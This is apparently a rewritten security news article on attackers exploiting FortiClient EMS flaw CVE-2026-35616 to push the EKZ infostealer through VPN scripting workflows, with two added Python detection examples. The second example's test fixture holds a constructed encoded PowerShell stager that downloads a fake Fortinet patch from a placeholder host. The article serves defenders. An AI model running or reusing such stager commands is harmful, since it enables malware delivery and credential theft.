FortiClient EMS Zero-Day CVE-2026-35616 Exploited to Deploy EKZ Infostealer in Targeted Attacks

Introduction

A newly discovered and actively exploited security flaw in FortiClient Enterprise Management Server (EMS) has triggered urgent warnings across the cybersecurity community. Tracked as CVE-2026-35616, the vulnerability allows unauthenticated attackers to bypass authentication and execute remote commands, turning enterprise VPN and endpoint management infrastructure into a silent delivery channel for malware. What makes this case especially dangerous is the abuse of trusted Fortinet workflows to deploy a stealth credential stealer known as EKZ, blending malicious activity with legitimate system behavior.

Summary of the Original Incident

Hackers are actively exploiting an authentication bypass vulnerability identified as CVE-2026-35616 in FortiClient EMS, a central management platform used to control Fortinet endpoint security agents.
The flaw is classified as an improper access control issue that enables unauthenticated remote attackers to execute arbitrary code or system commands through specially crafted requests.
Attackers have weaponized this vulnerability to deploy an undocumented infostealer known as EKZ, disguising it as a legitimate Fortinet endpoint update.
The attack chain begins with abuse of endpoint APIs that allow administrative-level actions without requiring authentication.
Once inside, attackers modify EMS configurations and VPN policies to inject malicious scripting logic into trusted workflows.
The malware execution is triggered when endpoints establish IPsec VPN tunnels to FortiGate firewalls, activating legitimate FortiClient components like fortitray.exe.
These components silently launch batch scripts via Command Prompt, which then execute encoded PowerShell commands.
The PowerShell payload downloads the EKZ infostealer, disguised as a Fortinet security patch, from attacker-controlled infrastructure.
The malware then runs silently, harvesting sensitive data such as browser credentials, cookies, and autofill information.
It targets both Chromium-based browsers and Firefox, extracting stored authentication data even from protected password stores.
The stolen information includes credentials, credit card details, addresses, and phone numbers.
It also collects session cookies, potentially bypassing multi-factor authentication protections.
Data exfiltration occurs over HTTP to a remote VPS controlled by the attackers.
Fortinet confirmed active exploitation in early April and released emergency patches for versions 7.4.5 and 7.4.6.
CISA issued urgent guidance requiring federal agencies to secure affected systems within a short timeframe.
At the same time, the Shadowserver Foundation reported more than 2,000 internet-exposed EMS instances.
Security firm Arctic Wolf later confirmed real-world exploitation campaigns deploying EKZ infostealer.
Researchers observed that attackers first manipulate endpoint APIs to gain unauthorized administrative capabilities.
They then alter VPN profiles and remote access configurations to ensure persistence and execution.
Log analysis revealed repeated anomalies such as missing certificate headers during authentication attempts.
This was often followed by successful updates referencing Fortinet certificate authorities.
Arctic Wolf recommends monitoring certificate-based authentication anomalies as early indicators of compromise.
Additional red flags include unfamiliar logins from Tor exit nodes or VPS-based IP addresses.
Unexpected creation of accounts or changes in remote access profiles should also be treated as high-risk indicators.
The campaign highlights how trusted enterprise management systems can be transformed into malware delivery pipelines.
EKZ itself functions as a standard infostealer but gains power through its privileged execution context.
The abuse of VPN scripting workflows allows attackers to blend malicious activity into normal administrative operations.
This makes detection significantly harder for traditional endpoint protection tools.
Security teams are advised to prioritize EMS patching and audit all administrative API access logs.
The incident underscores the growing trend of supply-chain-like attacks targeting management infrastructure itself.
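The management-layer indicators listed in the summary (a certificate-less authentication attempt followed shortly by a successful update referencing a Fortinet CA, logins from Tor exit or VPS ranges, and account or remote-access profile changes from unexpected hosts) can be triaged with a short pass over EMS telemetry. The following is an added example, not code from the article, Fortinet or Arctic Wolf; it assumes a simplified key=value log format, and the suspect network list and admin allowlist are placeholders you would replace with a real reputation feed and your own hosts.

```python
import ipaddress
from datetime import datetime, timedelta

# Constructed sample telemetry, NOT Fortinet's real EMS log format:
# "<ISO timestamp> <event> src=<ip> user=<name> <key=value ...>"
SAMPLE_LOG = """\
2026-04-02T08:00:01 auth_attempt src=203.0.113.10 user=admin cert_header=missing
2026-04-02T08:00:04 update_success src=203.0.113.10 user=admin issuer=Fortinet_CA
2026-04-02T08:01:10 login src=198.51.100.7 user=svc_ems
2026-04-02T08:02:30 account_created src=198.51.100.7 user=svc_ems new_user=backup_admin
2026-04-02T08:03:00 profile_changed src=198.51.100.7 user=svc_ems profile=vpn_default
2026-04-02T09:15:00 auth_attempt src=10.0.5.20 user=itops cert_header=present
2026-04-02T09:15:02 update_success src=10.0.5.20 user=itops issuer=Fortinet_CA
"""

# Placeholder range standing in for a Tor-exit / VPS reputation feed (assumed).
SUSPECT_NETWORKS = [ipaddress.ip_network("198.51.100.0/24")]
# Hosts from which administrative changes are expected (assumed allowlist).
ADMIN_ALLOWLIST = {"10.0.5.20"}
# How close a Fortinet-CA update must follow a certificate-less auth attempt to pair them.
CERT_UPDATE_WINDOW = timedelta(seconds=30)

def parse(line):
    ts, event, *kv = line.split()
    fields = dict(item.split("=", 1) for item in kv)
    fields["ts"] = datetime.fromisoformat(ts)
    fields["event"] = event
    return fields

def triage(log_text):
    """Return (event_index, rule_name) pairs for the indicators the article lists."""
    events = [parse(l) for l in log_text.splitlines() if l.strip()]
    findings = []
    pending = {}  # src -> time of the last auth attempt that carried no certificate header
    for i, e in enumerate(events):
        src = e.get("src", "")
        if e["event"] == "auth_attempt" and e.get("cert_header") == "missing":
            pending[src] = e["ts"]
        elif e["event"] == "update_success" and "Fortinet" in e.get("issuer", ""):
            t0 = pending.pop(src, None)
            if t0 is not None and e["ts"] - t0 <= CERT_UPDATE_WINDOW:
                findings.append((i, "cert_header_missing_then_fortinet_ca_update"))
        if e["event"] == "login" and any(ipaddress.ip_address(src) in n for n in SUSPECT_NETWORKS):
            findings.append((i, "login_from_tor_or_vps_range"))
        if e["event"] in ("account_created", "profile_changed") and src not in ADMIN_ALLOWLIST:
            findings.append((i, f"{e['event']}_from_unapproved_host"))
    return findings
```

Each finding carries the index of the offending line so it can be joined back to the raw record for investigation.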

What Undercode Say:

The exploitation of CVE-2026-35616 represents a shift in attacker strategy toward abusing trust boundaries inside enterprise management platforms.
Instead of relying on phishing or direct endpoint compromise, attackers are targeting centralized systems that already hold administrative control over thousands of endpoints.
FortiClient EMS becomes an especially attractive target because it bridges endpoint security, VPN access, and centralized policy management.
Once compromised, it effectively becomes a command hub for deploying malware at scale without triggering traditional endpoint alerts.
The use of authentication bypass removes the need for credential theft in the early stages of the attack chain.
This significantly lowers the barrier for attackers and increases automation potential in large-scale campaigns.
The integration of VPN scripting workflows is particularly dangerous because it blends malicious execution with expected enterprise behavior.
Security tools that rely on behavioral baselines may fail to distinguish legitimate FortiClient operations from malicious modifications.
The EKZ infostealer itself is not novel in capability, but its delivery mechanism is highly sophisticated.
By leveraging encoded PowerShell payloads, attackers avoid signature-based detection in many environments.
The use of base64 encoding and trusted Windows utilities like PowerShell and CMD demonstrates a classic living-off-the-land technique.
What elevates this threat is the timing-based execution triggered by VPN tunnel establishment events.
This allows malware activation to appear as a side effect of normal user or system activity.
The abuse of certificate-based authentication logs shows attackers are also attempting to manipulate trust signals within EMS.
Security teams must therefore focus not only on endpoint detection but also on management-layer telemetry.
Log anomalies such as unexpected certificate updates should be treated as early intrusion signals.
The Shadowserver report of 2,000 exposed EMS instances highlights a significant global attack surface.
Even a small exploitation rate could lead to widespread credential harvesting across enterprises.
Arctic Wolf’s findings reinforce that this is an active and ongoing campaign rather than a theoretical risk.
The most critical weakness here is not just the vulnerability itself but the architectural trust placed in EMS systems.
Once compromised, EMS effectively becomes a privileged execution environment across all managed endpoints.
This creates a cascading risk model where one breach can propagate laterally at administrative speed.
Defenders must assume that any exposed EMS instance is a high-priority target.
Immediate patching combined with strict network exposure reduction is essential.
Organizations should also segment EMS infrastructure from broader network access.
Monitoring should extend beyond endpoint antivirus into VPN behavior and administrative API usage.
Attackers are clearly optimizing for stealth rather than speed in this campaign.
The EKZ deployment shows careful orchestration designed to delay detection as long as possible.
This indicates a mature threat actor with understanding of enterprise security workflows.
The broader implication is that enterprise management platforms are now frontline attack surfaces.
Security strategy must evolve to treat them as critical infrastructure rather than supporting tools.
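The endpoint side of the chain described above (fortitray.exe launching a batch script through Command Prompt, which runs encoded PowerShell that fetches the payload) is the part that living-off-the-land detection has to catch by process lineage rather than by file signature. The following is an added example, not code from the article or any vendor product: it decodes the -EncodedCommand argument and flags it only when the ancestry passes through cmd.exe and fortitray.exe. The process events, the batch file name and the download host are constructed placeholders.

```python
import base64
import re

def enc_utf16le_b64(ps_script):  # the UTF-16LE + base64 form that -EncodedCommand expects
    return base64.b64encode(ps_script.encode("utf-16le")).decode()

# Constructed stager text with a placeholder host; the article names no download URL.
STAGER = "Invoke-WebRequest https://updates.example.invalid/FortiClientPatch.exe -OutFile patch.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed process-creation events with Sysmon-style fields, not a real capture.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Fortinet\FortiClient\fortitray.exe", "cmdline": "fortitray.exe"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd.exe /c C:\ProgramData\vpnhook.bat"},
    {"pid": 102, "ppid": 101, "image": PS, "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + enc_utf16le_b64(STAGER)},
    # Benign contrast: an admin running encoded PowerShell from an interactive session.
    {"pid": 200, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 201, "ppid": 200, "image": PS, "cmdline": "powershell.exe -EncodedCommand " + enc_utf16le_b64("Get-Service FA_Scheduler")},
]

DOWNLOAD_CUES = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer", re.I)
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent or not valid UTF-16LE base64."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def lineage(events, pid):
    """Image names from the process up through its known ancestors, child first."""
    by_pid = {e["pid"]: e for e in events}
    names = []
    while pid in by_pid:
        names.append(by_pid[pid]["image"].rsplit("\\", 1)[-1].lower())
        pid = by_pid[pid]["ppid"]
    return names

def find_vpn_hook_abuse(events):
    """Flag encoded PowerShell with download cues whose ancestry includes cmd.exe and fortitray.exe."""
    hits = []
    for e in events:
        chain = lineage(events, e["pid"])
        if chain[0] != "powershell.exe" or "cmd.exe" not in chain or "fortitray.exe" not in chain:
            continue
        script = decode_encoded_command(e["cmdline"])
        if script and DOWNLOAD_CUES.search(script):
            hits.append((e["pid"], " <- ".join(chain)))
    return hits
```

The benign event from explorer.exe is deliberately included so the rule fires on the lineage, not on the mere presence of an encoded command.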

Fact Checker Results

✔ CVE-2026-35616 is described as an authentication bypass affecting FortiClient EMS that enables remote code execution.
✔ Arctic Wolf and Fortinet reports confirm active exploitation and deployment of credential-stealing malware EKZ.
✔ CISA advisories and Shadowserver exposure data align with urgent patching and widespread internet-facing EMS systems.

Prediction

The exploitation of EMS platforms will likely increase as attackers prioritize centralized management systems over individual endpoints.
Future campaigns may expand EKZ-like tools into modular infostealers combined with ransomware staging components.
Enterprise VPN and endpoint management servers will become primary targets for stealth-based intrusion campaigns in 2026 and beyond.

References:

Reported By: www.bleepingcomputer.com